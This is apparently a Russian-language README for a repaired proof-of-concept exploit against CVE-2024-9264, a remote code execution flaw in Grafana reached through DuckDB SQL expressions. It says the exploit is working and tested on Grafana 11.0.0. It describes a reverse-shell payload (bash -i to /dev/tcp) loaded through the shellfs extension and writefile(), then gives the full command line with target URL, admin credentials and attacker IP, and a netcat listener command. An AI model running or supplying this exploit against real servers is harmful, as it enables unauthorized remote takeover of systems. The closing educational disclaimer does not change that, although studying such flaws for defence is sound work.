
Исправленный эксплойт (proof-of-concept) для CVE-2024-9264, критической уязвимости удаленного выполнения кода (RCE) в Grafana через SQL-выражения DuckDB. Выполняет обратную оболочку (reverse shell) с использованием исправленного расширения shellfs и функции writefile().
Это исправленная версия proof-of-concept эксплуатации уязвимости CVE-2024-9264, критической уязвимости удаленного выполнения кода в Grafana (через SQL-выражения и DuckDB).
🔗 Оригинальное уведомление: Grafana Security Release
❌ Оригинальный PoC: нерабочий из-за синтаксических ошибок и неправильного использования write_file()
✅ Эта версия работает, протестирована на уязвимом экземпляре Grafana 11.0.0.
writefile() вместо write_file() (функция DuckDB)bash -i >& /dev/tcp/...shellfsinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
Затем слушайте с помощью:
nc -lvnp 4444
Этот проект предназначен только для образовательных целей.
Не используйте его против целей, на которые у вас нет разрешения тестировать.
Модифицировано и проверено Exerr — оригинальный PoC от z3k0sec.